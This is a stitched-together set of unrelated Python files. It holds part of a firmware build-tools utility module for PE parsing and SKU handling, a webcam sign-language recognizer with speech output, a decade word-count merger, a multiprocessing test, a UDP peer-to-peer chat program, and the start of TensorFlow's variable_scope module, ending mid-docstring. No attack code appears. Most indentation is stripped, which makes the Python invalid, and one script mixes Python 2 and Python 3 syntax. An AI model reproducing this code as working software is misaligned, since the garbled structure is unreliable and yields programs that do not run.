ByteArray.fromfile(PeObject, 4)
# PE signature should be 'PE\0\0'
        if ByteArray.tobytes() != b'PE\0\0':
self.ErrorInfo = self.FileName + ' has no valid PE signature PE00'
return
# Read PE file header
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, 0x14)
ByteList = ByteArray.tolist()
SecNumber = self._ByteListToInt(ByteList[0x2:0x4])
if SecNumber == 0:
self.ErrorInfo = self.FileName + ' has no section header'
return
# Read PE optional header
OptionalHeaderSize = self._ByteListToInt(ByteArray[0x10:0x12])
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, OptionalHeaderSize)
ByteList = ByteArray.tolist()
self.EntryPoint = self._ByteListToInt(ByteList[0x10:0x14])
self.SectionAlignment = self._ByteListToInt(ByteList[0x20:0x24])
self.Size = self._ByteListToInt(ByteList[0x38:0x3C])
# Read each Section Header
for Index in range(SecNumber):
ByteArray = array.array('B')
ByteArray.fromfile(PeObject, 0x28)
ByteList = ByteArray.tolist()
SecName = self._ByteListToStr(ByteList[0:8])
SecVirtualSize = self._ByteListToInt(ByteList[8:12])
SecRawAddress = self._ByteListToInt(ByteList[20:24])
SecVirtualAddress = self._ByteListToInt(ByteList[12:16])
self.SectionHeaderList.append((SecName, SecVirtualAddress, SecRawAddress, SecVirtualSize))
self.IsValid = True
PeObject.close()
def _ByteListToStr(self, ByteList):
String = ''
for index in range(len(ByteList)):
if ByteList[index] == 0:
break
String += chr(ByteList[index])
return String
def _ByteListToInt(self, ByteList):
Value = 0
for index in range(len(ByteList) - 1, -1, -1):
Value = (Value << 8) | int(ByteList[index])
return Value
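# Minimal usage sketch (the path is illustrative):
#   Pe = PeImageClass('Module.efi')
#   if Pe.IsValid:
#       for Name, VirtualAddress, RawAddress, VirtualSize in Pe.SectionHeaderList:
#           pass    # inspect each section header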
class DefaultStore():
def __init__(self, DefaultStores ):
self.DefaultStores = DefaultStores
def DefaultStoreID(self, DefaultStoreName):
for key, value in self.DefaultStores.items():
if value == DefaultStoreName:
return key
return None
def GetDefaultDefault(self):
if not self.DefaultStores or "0" in self.DefaultStores:
return "0", TAB_DEFAULT_STORES_DEFAULT
else:
minvalue = min(int(value_str) for value_str in self.DefaultStores)
return (str(minvalue), self.DefaultStores[str(minvalue)])
def GetMin(self, DefaultSIdList):
if not DefaultSIdList:
return TAB_DEFAULT_STORES_DEFAULT
storeidset = {storeid for storeid, storename in self.DefaultStores.values() if storename in DefaultSIdList}
if not storeidset:
return ""
minid = min(storeidset )
for sid, name in self.DefaultStores.values():
if sid == minid:
return name
class SkuClass():
DEFAULT = 0
SINGLE = 1
    MULTIPLE = 2
def __init__(self,SkuIdentifier='', SkuIds=None):
if SkuIds is None:
SkuIds = {}
for SkuName in SkuIds:
SkuId = SkuIds[SkuName][0]
skuid_num = int(SkuId, 16) if SkuId.upper().startswith("0X") else int(SkuId)
if skuid_num > 0xFFFFFFFFFFFFFFFF:
EdkLogger.error("build", PARAMETER_INVALID,
ExtraData = "SKU-ID [%s] value %s exceeds the max value of UINT64"
% (SkuName, SkuId))
self.AvailableSkuIds = OrderedDict()
self.SkuIdSet = []
self.SkuIdNumberSet = []
self.SkuData = SkuIds
self._SkuInherit = {}
self._SkuIdentifier = SkuIdentifier
if SkuIdentifier == '' or SkuIdentifier is None:
self.SkuIdSet = ['DEFAULT']
self.SkuIdNumberSet = ['0U']
elif SkuIdentifier == 'ALL':
self.SkuIdSet = list(SkuIds.keys())
self.SkuIdNumberSet = [num[0].strip() + 'U' for num in SkuIds.values()]
else:
r = SkuIdentifier.split('|')
self.SkuIdSet=[(r[k].strip()).upper() for k in range(len(r))]
k = None
try:
self.SkuIdNumberSet = [SkuIds[k][0].strip() + 'U' for k in self.SkuIdSet]
except Exception:
EdkLogger.error("build", PARAMETER_INVALID,
ExtraData = "SKU-ID [%s] is not supported by the platform. [Valid SKU-ID: %s]"
% (k, " | ".join(SkuIds.keys())))
for each in self.SkuIdSet:
if each in SkuIds:
self.AvailableSkuIds[each] = SkuIds[each][0]
else:
EdkLogger.error("build", PARAMETER_INVALID,
ExtraData="SKU-ID [%s] is not supported by the platform. [Valid SKU-ID: %s]"
% (each, " | ".join(SkuIds.keys())))
if self.SkuUsageType != SkuClass.SINGLE:
self.AvailableSkuIds.update({'DEFAULT':0, 'COMMON':0})
if self.SkuIdSet:
GlobalData.gSkuids = (self.SkuIdSet)
if 'COMMON' in GlobalData.gSkuids:
GlobalData.gSkuids.remove('COMMON')
if self.SkuUsageType == self.SINGLE:
if len(GlobalData.gSkuids) != 1:
if 'DEFAULT' in GlobalData.gSkuids:
GlobalData.gSkuids.remove('DEFAULT')
if GlobalData.gSkuids:
GlobalData.gSkuids.sort()
def GetNextSkuId(self, skuname):
if not self._SkuInherit:
self._SkuInherit = {}
for item in self.SkuData.values():
self._SkuInherit[item[1]]=item[2] if item[2] else "DEFAULT"
return self._SkuInherit.get(skuname, "DEFAULT")
def GetSkuChain(self, sku):
if sku == "DEFAULT":
return ["DEFAULT"]
skulist = [sku]
nextsku = sku
while True:
nextsku = self.GetNextSkuId(nextsku)
skulist.append(nextsku)
if nextsku == "DEFAULT":
break
skulist.reverse()
return skulist
def SkuOverrideOrder(self):
skuorderset = []
for skuname in self.SkuIdSet:
skuorderset.append(self.GetSkuChain(skuname))
skuorder = []
for index in range(max(len(item) for item in skuorderset)):
for subset in skuorderset:
if index > len(subset)-1:
continue
if subset[index] in skuorder:
continue
skuorder.append(subset[index])
return skuorder
@property
def SkuUsageType(self):
if self._SkuIdentifier.upper() == "ALL":
return SkuClass.MULTIPLE
if len(self.SkuIdSet) == 1:
if self.SkuIdSet[0] == 'DEFAULT':
return SkuClass.DEFAULT
return SkuClass.SINGLE
if len(self.SkuIdSet) == 2 and 'DEFAULT' in self.SkuIdSet:
return SkuClass.SINGLE
return SkuClass.MULTIPLE
def DumpSkuIdArrary(self):
if self.SkuUsageType == SkuClass.SINGLE:
return "{0x0}"
ArrayStrList = []
for skuname in self.AvailableSkuIds:
if skuname == "COMMON":
continue
while skuname != "DEFAULT":
ArrayStrList.append(hex(int(self.AvailableSkuIds[skuname])))
skuname = self.GetNextSkuId(skuname)
ArrayStrList.append("0x0")
return "{{{myList}}}".format(myList=",".join(ArrayStrList))
@property
def AvailableSkuIdSet(self):
return self.AvailableSkuIds
@property
def SystemSkuId(self):
if self.SkuUsageType == SkuClass.SINGLE:
if len(self.SkuIdSet) == 1:
return self.SkuIdSet[0]
else:
return self.SkuIdSet[0] if self.SkuIdSet[0] != 'DEFAULT' else self.SkuIdSet[1]
else:
return 'DEFAULT'
## Get the integer value from string like "14U" or integer like 2
#
#   @param Input    The object that may be either an integer value or a string
#
# @retval Value The integer value that the input represents
#
def GetIntegerValue(Input):
if not isinstance(Input, str):
return Input
String = Input
if String.endswith("U"):
String = String[:-1]
if String.endswith("ULL"):
String = String[:-3]
if String.endswith("LL"):
String = String[:-2]
if String.startswith("0x") or String.startswith("0X"):
return int(String, 16)
elif String == '':
return 0
else:
return int(String)
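# Examples:
#   GetIntegerValue('14U')      # -> 14
#   GetIntegerValue('0x10ULL')  # -> 16
#   GetIntegerValue(2)          # -> 2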
#
# Pack a GUID (registry format) list into a buffer and return it
#
def PackGUID(Guid):
return pack(PACK_PATTERN_GUID,
int(Guid[0], 16),
int(Guid[1], 16),
int(Guid[2], 16),
int(Guid[3][-4:-2], 16),
int(Guid[3][-2:], 16),
int(Guid[4][-12:-10], 16),
int(Guid[4][-10:-8], 16),
int(Guid[4][-8:-6], 16),
int(Guid[4][-6:-4], 16),
int(Guid[4][-4:-2], 16),
int(Guid[4][-2:], 16)
)
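# Example sketch (PACK_PATTERN_GUID is the EFI_GUID struct format defined
# elsewhere in this module; the GUID below is arbitrary):
#   PackGUID('0D1B936F-68F3-4589-AFCC-FB8B7AEBC836'.split('-'))   # -> 16 bytes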
#
# Pack a GUID (byte) list into a buffer and return it
#
def PackByteFormatGUID(Guid):
return pack(PACK_PATTERN_GUID,
Guid[0],
Guid[1],
Guid[2],
Guid[3],
Guid[4],
Guid[5],
Guid[6],
Guid[7],
Guid[8],
Guid[9],
Guid[10],
)
## DeepCopy a dict/OrderedDict recursively
#
#   @param ori_dict    a nested dict or OrderedDict
#
#   @retval a new dict or OrderedDict
#
def CopyDict(ori_dict):
dict_type = ori_dict.__class__
if dict_type not in (dict,OrderedDict):
return ori_dict
new_dict = dict_type()
for key in ori_dict:
if isinstance(ori_dict[key],(dict,OrderedDict)):
new_dict[key] = CopyDict(ori_dict[key])
else:
new_dict[key] = ori_dict[key]
return new_dict
#
# Remove the c/c++ comments: // and /* */
#
def RemoveCComments(ctext):
    return re.sub(r'//.*?\n|/\*.*?\*/', '\n', ctext, flags=re.S)
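# Example:
#   RemoveCComments('int a; // note\n/* block */ int b;')
#   # -> 'int a; \n\n int b;'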
# File: fun_util.py
import cv2, pickle
import numpy as np
import tensorflow as tf
from cnn_tf import cnn_model_fn
import os
import sqlite3
from keras.models import load_model
import constants
from PIL import Image, ImageTk
from threading import Thread
import util
import time
import pyttsx3
speaking = True
vstream = raw = None
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
model = load_model('signlang/cnn_model_keras2.h5')
if constants.DEBUG:
file = open("dump.txt", "w")
else:
create = False
count = 1
while not create:
try:
name = "lexaid (" + str(count) + ").txt"
file = open(name, "x")
create = True
file.close()
file = open(name, "w")
except FileExistsError as fee:
count += 1
engine = None
if constants.DEBUG:
engine = pyttsx3.init()
engine.setProperty("rate", 150)
def ttsdirect(s):
global engine
while engine._inLoop:
pass
engine.say(s)
engine.runAndWait()
def get_image_size():
img = cv2.imread('signlang/gestures/0/100.jpg', 0)
return img.shape
image_x, image_y = get_image_size()
def write_word(text):
print("Wrote:", text)
try:
file.write(text)
file.flush()
os.fsync(file.fileno())
except Exception:
pass
def keras_process_image(img):
img = cv2.resize(img, (image_x, image_y))
img = np.array(img, dtype = np.float32)
img = np.reshape(img, (1, image_x, image_y, 1))
return img
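# e.g. a 50x50 grayscale gesture crop (the actual size is read from a sample
# image above) becomes a (1, 50, 50, 1) float32 batch of one for the model.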
def keras_predict(model, image):
processed = keras_process_image(image)
pred_probab = model.predict(processed)[0]
pred_class = list(pred_probab).index(max(pred_probab))
return max(pred_probab), pred_class
def get_pred_text_from_db(pred_class):
conn = sqlite3.connect("signlang/gesture_db.db")
cmd = "SELECT g_name FROM gesture WHERE g_id=" + str(pred_class)
cursor = conn.execute(cmd)
for row in cursor:
return row[0]
def get_hand_hist():
    with open("hist", "rb") as f:
hist = pickle.load(f)
return hist
cam = None
x, y, w, h = 300, 100, 300, 300
hist = None
text = word = ""
count_frame = 0
def recognize():
global cam, hist
if not constants.PI:
cam = cv2.VideoCapture(constants.camera_driver)
else:
util.openCamera(True)
hist = get_hand_hist()
constants.pressedKey = None
constants.streamState = True
constants.calibrated = True
render()
def render():
global cam, hist, text, word, count_frame
if constants.PI:
img = util.getStreamFrame()
if img is None:
return
else:
img = cam.read()[1]
img = cv2.flip(img, 1)
imgCrop = img[y:y + h, x:x + w]
imgHSV = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
dst = cv2.calcBackProject([imgHSV], [0, 1], hist, [0, 180, 0, 256], 1)
disc = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (10, 10))
cv2.filter2D(dst, -1, disc, dst)
blur = cv2.GaussianBlur(dst, (11, 11), 0)
blur = cv2.medianBlur(blur, 15)
thresh = cv2.threshold(blur, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)[1]
thresh = cv2.merge((thresh, thresh, thresh))
thresh = cv2.cvtColor(thresh, cv2.COLOR_BGR2GRAY)
fullthresh = thresh
thresh = thresh[y:y + h, x:x + w]
    # OpenCV 3 returns (image, contours, hierarchy); OpenCV 4 returns
    # (contours, hierarchy). Index -2 picks the contour list in both.
    contours = cv2.findContours(thresh.copy(), cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)[-2]
old_text = text
if len(contours) > 0:
contour = max(contours, key = cv2.contourArea)
#print(cv2.contourArea(contour))
if cv2.contourArea(contour) > 10000:
x1, y1, w1, h1 = cv2.boundingRect(contour)
save_img = thresh[y1:y1 + h1, x1:x1 + w1]
if w1 > h1:
save_img = cv2.copyMakeBorder(save_img, int((w1 - h1)/2), int((w1 - h1)/2), 0, 0, cv2.BORDER_CONSTANT, (0, 0, 0))
elif h1 > w1:
save_img = cv2.copyMakeBorder(save_img, 0, 0, int((h1 - w1)/2), int((h1 - w1)/2), cv2.BORDER_CONSTANT, (0, 0, 0))
pred_probab, pred_class = keras_predict(model, save_img)
print(pred_class, pred_probab)
if pred_probab * 100 > 70:
text = get_pred_text_from_db(pred_class)
if old_text == text:
count_frame += 1
else:
count_frame = 0
if count_frame == 20:
Thread(target=ttsdirect, args=(text,)).start()
word = word + text
elif cv2.contourArea(contour) < 1000:
word = word.strip()
if len(word) > 0:
print(word)
write_word(word + " ")
Thread(target=ttsdirect, args=(word,)).start()
text = ""
word = ""
else:
word = word.strip()
if len(word) > 0:
print(word)
write_word(word + " ")
Thread(target=ttsdirect, args=(word,)).start()
text = ""
word = ""
blackboard = np.zeros((200, 640, 3), dtype = np.uint8)
blackboard[0:3, 0:] = (0, 255, 255)
#splitted_text = split_sentence(text, 2)
#put_splitted_text_in_blackboard(blackboard, splitted_text)
cv2.putText(blackboard, text, (30, 50), cv2.FONT_HERSHEY_SIMPLEX, 1.5, (255, 255, 255))
cv2.putText(blackboard, word, (30, 150), cv2.FONT_HERSHEY_SIMPLEX, 2, (255, 255, 255))
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
fullthresh = cv2.cvtColor(fullthresh, cv2.COLOR_GRAY2RGB)
cv2.rectangle(img, (x,y), (x+w, y+h), (0,255,0), 2)
cv2.rectangle(fullthresh, (x,y), (x+w, y+h), (0,255,0), 2)
res = None
if constants.streamState:
res = img
else:
res = fullthresh
pic = np.vstack((res, blackboard))
    timg = Image.fromarray(pic).resize(constants.stream_dimens, Image.LANCZOS)  # ANTIALIAS was removed in newer Pillow; LANCZOS is the same filter
timgtk = ImageTk.PhotoImage(image = timg)
constants.lblUtilStream.imgtk = timgtk
constants.lblUtilStream.configure(image = timgtk)
if constants.pressedKey == "s":
print(word)
if not constants.PI:
cam.release()
else:
util.closeCamera()
cv2.destroyAllWindows()
file.close()
constants.pressedKey = None
else:
constants.lblUtilStream.after(10, render)
# File: makedecadescounts.py
import argparse
import numpy as np
from multiprocessing import Process, Queue
import collections
from queue import Empty
from ioutils import mkdir, write_pickle, load_pickle
def worker(proc_num, queue, out_dir, in_dir):
while True:
try:
decade = queue.get(block=False)
except Empty:
break
print "Processing decade", decade
for year in range(10):
year_counts = load_pickle(in_dir + str(decade + year) + "-counts.pkl")
if year == 0:
merged_year_counts = year_counts
for word, count in year_counts.iteritems():
if not word in merged_year_counts:
merged_year_counts[word] = 0
merged_year_counts[word] += year_counts[word]
write_pickle(merged_year_counts, out_dir + str(decade) + "-counts.pkl")
def run_parallel(num_procs, out_dir, in_dir, decades):
queue = Queue()
for decade in decades:
queue.put(decade)
procs = [Process(target=worker, args=[i, queue, out_dir, in_dir]) for i in range(num_procs)]
for p in procs:
p.start()
for p in procs:
p.join()
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Merge counts for 1gram data.")
parser.add_argument("base_dir", help="base directoty. /counts should be a subdir")
parser.add_argument("num_procs", type=int, help="number of processes to spawn")
parser.add_argument("--start-year", type=int, help="start year (inclusive)")
parser.add_argument("--end-year", type=int, help="end year (inclusive)")
args = parser.parse_args()
    decades = list(range(args.start_year, args.end_year + 1, 10))
    decades.reverse()
out_dir = args.base_dir + "/decades/counts/"
mkdir(out_dir)
run_parallel(args.num_procs, out_dir, args.base_dir + "/counts/", decades)
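# Usage sketch (paths are illustrative):
#   python makedecadescounts.py /data/ngrams 4 --start-year 1900 --end-year 1999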
# File: test_multiprocessing.py
from declarativeunittest import *
from construct import *
from construct.lib import *
def worker(q):
obj = q.get()
print(obj)
def test_multiprocessing():
import multiprocessing
queue = multiprocessing.Queue()
p = multiprocessing.Process(target=worker, args=(queue,))
p.start()
obj = Container(name="test")
print(obj)
queue.put(obj)
# Wait for the worker to finish
queue.close()
queue.join_thread()
p.join()
# File: seeder.py
from Node import Seeder
import socket as s
import threading as th
import json
import time
import sys
from tkinter import *
import encrypt as e
import getipv6
enc=e.MYcrypt()
alias=sys.argv[1]
S=s.socket(s.AF_INET6,s.SOCK_DGRAM)
HOST=getipv6.HOST
S.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR,1)
S.bind((HOST,6969))
print("Share this link\n"+enc.encrypt(HOST,0,sep='m'))
print("*"*50+"\n"+"*"*50+"\n"+"\t\tTHIS CHAT IS POWERED BY BAZOOKA\n"+"*"*50+"\n"+"*"*50+"\n")
print("MADE BY khallnayak\n\n\n")
peer_threads={}
inp_data=""
def send_data(text):
obj.inp_data=text.get("1.0",END)[:-1]
text.delete("1.0",END)
def gui():
root=Tk()
root.geometry("300x50+0+0")
root.protocol("WM_DELETE_WINDOW",sys.exit)
root.title("PRESS Ctrl TO SEND")
text=Text(root,wrap=WORD,font=("Verdana",10))
text.pack()
text.bind("<Control_L>",func=lambda x: send_data(text))
root.mainloop()
new_thread=th.Thread(target=gui,)
new_thread.start()
"""
INIT FILE NAME AND GENERATE BLOCKS WITH LEDGER
ASK FOR TIER SIZE
"""
class Msg():
def __init__(self):
self.inp_data=""
obj=Msg()
seeder=Seeder(3)
def refresh(soc,chain,addr):
try:
soc.sendto(json.dumps(chain).encode(),addr)
return True
except OSError as e:
return False
def seed(soc,addr):
#print("In seed")
msg="NanDeMoNay".encode()
flag,number=seeder.allocate_number()
soc.sendto(json.dumps(number).encode(),addr)
#print(soc)
if(type(number)==int):
answer,ans_addr=soc.recvfrom(40)
#print(answer,ans_addr)
if(answer):
seeder.init_connection(addr)
soc.sendto(json.dumps(seeder.size).encode(),ans_addr)
flag=refresh(soc,seeder.get_chain(),ans_addr)
other_alias,_=soc.recvfrom(1024)
other_alias=other_alias.decode()
soc.sendto(str(alias).encode(),ans_addr)
"""
SEND LEDGER SHIT
"""
if(not flag):
#Something error
print("FLAG ERROR",flag)
else:
soc.close()
print("NO ANSWER FROM PEER")
sys.exit()
time1=time.time()
while True:
try:
if(time.time()-time1>=5):
soc.sendto("CHAIN".encode(),ans_addr)
chain,_=soc.recvfrom(2048)
chain=chain.decode()
#print(chain,"\t FROM PEER",number)
seeder.update_chain(chain,number)
refresh(soc,seeder.get_chain(),ans_addr)
#print("CHAIN UPDATE")
time1=time.time()
else:
"""
1. SELECT BLOCK NUMBER AND SEND BLOCK
2. BLOCK CHECKING ON PEER SIDE
"""
if(obj.inp_data!=""):
print("[SELF] "+obj.inp_data)
soc.sendto(obj.inp_data.encode(),ans_addr)
obj.inp_data=""
else:
pass
soc.sendto(msg,ans_addr)
data,addr=soc.recvfrom(1024)
if(data!=b"NanDeMoNay"):
print("[{0}] ".format(other_alias)+data.decode())
#time.sleep(0.2)
except OSError as e:
print(e)
while True:
thread=[]
sockets=[]
try:
data,addr=S.recvfrom(1024)
print(data,addr,"IN MAIN",sep="\t")
        if(addr not in peer_threads.keys()):
            sockets.append(s.socket(s.AF_INET6,s.SOCK_DGRAM))
            sockets[-1].setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR,1)
            thread.append(th.Thread(target=seed,args=(sockets[-1],addr,)))
            thread[-1].start()
            peer_threads[addr]=thread[-1]   # remember this peer so no duplicate thread is spawned for it
except KeyboardInterrupt as e:
break
# File: variable_scope.py
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A class to store named variables and a scope operator to manage sharing."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections as collections_lib
import copy
import enum # pylint: disable=g-bad-import-order
import functools
import sys
import threading
import traceback
import six
from six import iteritems
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python import tf2
from tensorflow.python.eager import context
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import deprecation
from tensorflow.python.util import function_utils
from tensorflow.python.util import tf_contextlib
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.tf_export import tf_export
__all__ = [
"AUTO_REUSE", "VariableScope", "get_variable_scope", "get_variable",
"get_local_variable", "variable_scope", "variable_op_scope",
"no_regularizer", "VariableSynchronization", "VariableAggregation"
]
class _PartitionInfo(object):
"""Holds partition info used by initializer functions.
"""
def __init__(self, full_shape, var_offset):
"""Constructor.
Args:
full_shape: Tuple or list of `int` indicating the full combined shape
of the partitioned variables.
var_offset: Tuple or list of `int` specifying offset of this partition
with respect to the full variable for each dimension.
Raises:
TypeError: If `full_shape` or `var_offset` is not a sequence.
ValueError: If `full_shape` or `var_offset` differ in length. If
`var_offset` exceeds `full_shape` in any dimension.
"""
if not isinstance(full_shape, collections_lib.Sequence) or isinstance(
full_shape, six.string_types):
raise TypeError(
"`full_shape` must be a sequence (like tuple or list) instead of " +
type(full_shape).__name__)
if not isinstance(var_offset, collections_lib.Sequence) or isinstance(
var_offset, six.string_types):
raise TypeError(
"`var_offset` must be a sequence (like tuple or list) instead of " +
type(var_offset).__name__)
if len(var_offset) != len(full_shape):
raise ValueError(
"Expected equal length, but `var_offset` is of length {} while "
"full_shape is of length {}.".format(
len(var_offset), len(full_shape)))
for i in xrange(len(full_shape)):
offset = var_offset[i]
shape = full_shape[i]
if offset < 0 or offset >= shape:
raise ValueError(
"Expected 0 <= offset < shape but found offset={}, shape={} for "
"var_offset={}, full_shape={}".format(offset, shape, var_offset,
full_shape))
self._full_shape = full_shape
self._var_offset = var_offset
@property
def full_shape(self):
return self._full_shape
@property
def var_offset(self):
return self._var_offset
def single_offset(self, shape):
"""Returns the offset when the variable is partitioned in at most one dim.
Args:
shape: Tuple or list of `int` indicating the shape of one specific
variable partition.
Returns:
`int` representing the offset in the dimension along which the variable is
partitioned. Returns 0 if the variable is not being partitioned.
Raises:
ValueError: Depending on self.single_slice_dim().
"""
single_slice_dim = self.single_slice_dim(shape)
# If this variable is not being partitioned at all, single_slice_dim() could
# return None.
if single_slice_dim is None:
return 0
return self.var_offset[single_slice_dim]
def single_slice_dim(self, shape):
"""Returns the slice dim when the variable is partitioned only in one dim.
Args:
shape: Tuple or list of `int` indicating the shape of one specific
variable partition.
Returns:
`int` representing the dimension that the variable is partitioned in, or
`None` if the variable doesn't seem to be partitioned at all.
Raises:
TypeError: If `shape` is not a sequence.
ValueError: If `shape` is not the same length as `self.full_shape`. If
the variable is partitioned in more than one dimension.
"""
if not isinstance(shape, collections_lib.Sequence) or isinstance(
shape, six.string_types):
raise TypeError(
"`shape` must be a sequence (like tuple or list) instead of " +
type(shape).__name__)
if len(shape) != len(self.full_shape):
raise ValueError(
"Expected equal length, but received shape={} of length {} while "
"self.full_shape={} is of length {}.".format(shape, len(
shape), self.full_shape, len(self.full_shape)))
for i in xrange(len(shape)):
if self.var_offset[i] + shape[i] > self.full_shape[i]:
raise ValueError(
"With self.var_offset={}, a partition of shape={} would exceed "
"self.full_shape={} in dimension {}.".format(
self.var_offset, shape, self.full_shape, i))
slice_dim = None
for i in xrange(len(shape)):
if shape[i] == self.full_shape[i]:
continue
if slice_dim is not None:
raise ValueError(
"Cannot use single_slice_dim() with shape={} and "
"self.full_shape={} since slice dim could be either dimension {} "
"or {}.".format(shape, self.full_shape, i, slice_dim))
slice_dim = i
return slice_dim
class _ReuseMode(enum.Enum):
"""Mode for variable access within a variable scope."""
# Indicates that variables are to be fetched if they already exist or
# otherwise created.
AUTO_REUSE = 1
  # TODO(alive): For TensorFlow 2.0, deprecate True/False/None API in favor of
# enum values.
# REUSE_FALSE = 2
# REUSE_TRUE = 3
# TODO(apassos) remove these forwarding symbols.
VariableSynchronization = variables.VariableSynchronization # pylint: disable=invalid-name
VariableAggregation = variables.VariableAggregation # pylint: disable=invalid-name
AUTO_REUSE = _ReuseMode.AUTO_REUSE
tf_export(v1=["AUTO_REUSE"]).export_constant(__name__, "AUTO_REUSE")
AUTO_REUSE.__doc__ = """
When passed in as the value for the `reuse` flag, AUTO_REUSE indicates that
get_variable() should create the requested variable if it doesn't exist or, if
it does exist, simply return it.
"""
_DEFAULT_USE_RESOURCE = tf2.enabled()
@tf_export(v1=["enable_resource_variables"])
def enable_resource_variables():
"""Creates resource variables by default.
Resource variables are improved versions of TensorFlow variables with a
well-defined memory model. Accessing a resource variable reads its value, and
all ops which access a specific read value of the variable are guaranteed to
see the same value for that tensor. Writes which happen after a read (by
having a control or data dependency on the read) are guaranteed not to affect
the value of the read tensor, and similarly writes which happen before a read
are guaranteed to affect the value. No guarantees are made about unordered
read/write pairs.
  Calling tf.enable_resource_variables() lets you opt in to this TensorFlow 2.0
feature.
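  For illustration, a minimal sketch (assuming TensorFlow 1.x graph mode):
  ```python
  import tensorflow as tf
  tf.enable_resource_variables()
  v = tf.get_variable("v", shape=[], initializer=tf.zeros_initializer())
  # v is now backed by a resource variable rather than a reference variable.
  ```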
"""
global _DEFAULT_USE_RESOURCE
_DEFAULT_USE_RESOURCE = True
@deprecation.deprecated(
None, "non-resource variables are not supported in the long term")
@tf_export(v1=["disable_resource_variables"])
def disable_resource_variables():
"""Opts out of resource variables.
If your code needs tf.disable_resource_variables() to be called to work
properly please file a bug.
"""
global _DEFAULT_USE_RESOURCE
_DEFAULT_USE_RESOURCE = False
class _VariableStore(object):
"""Variable store that carries a number of named Variables.
New variable names and new variables can be created; all stored
variables are initialized with the initializer passed to __init__.
Attributes:
vars: a dictionary with string names (same as passed in GetVar) as keys
and the corresponding TensorFlow Variables as values.
"""
def __init__(self):
"""Create a variable store."""
self._vars = {} # A dictionary of the stored TensorFlow variables.
self._partitioned_vars = {} # A dict of the stored PartitionedVariables.
self._store_eager_variables = False
def get_variable(self,
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with these parameters or create a new one.
If a variable with the given name is already stored, we return the stored
variable. Otherwise, we create a new one.
Set `reuse` to `True` when you only want to reuse existing Variables.
Set `reuse` to `False` when you only want to create new Variables.
Set `reuse` to None (the default) or tf.AUTO_REUSE when you want
variables to be created if they don't exist or returned if they do.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If a partitioner is provided, a `PartitionedVariable` is returned.
Accessing this object as a `Tensor` returns the shards concatenated along
the partition axis.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable.
regularizer: A (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
reuse: a Boolean, None, or tf.AUTO_REUSE. Controls reuse or creation
of variables. When eager execution is enabled this argument is always
forced to be False.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
`trainable` defaults to `True` unless `synchronization` is
set to `ON_READ`.
collections: List of graph collections keys to add the `Variable` to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the `Variable` reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and dtype of the `Variable` to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates
instead an experimental ResourceVariable which has well-defined
semantics. Defaults to False (will later change to True).
When eager execution is enabled this argument is always forced to be
true.
custom_getter: Callable that takes as a first argument the true getter,
and allows overwriting the internal get_variable method.
The signature of `custom_getter` should match that of this method,
but the most future-proof version will allow for changes:
`def custom_getter(getter, *args, **kwargs)`. Direct access to
all `get_variable` parameters is also allowed:
`def custom_getter(getter, name, *args, **kwargs)`. A simple identity
custom getter that simply creates variables with modified names is:
```python
def custom_getter(getter, name, *args, **kwargs):
return getter(name + '_suffix', *args, **kwargs)
```
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
      synchronization: Indicates when a distributed variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses
when to synchronize. If `synchronization` is set to `ON_READ`,
`trainable` must not be set to `True`.
aggregation: Indicates how a distributed variable will be aggregated.
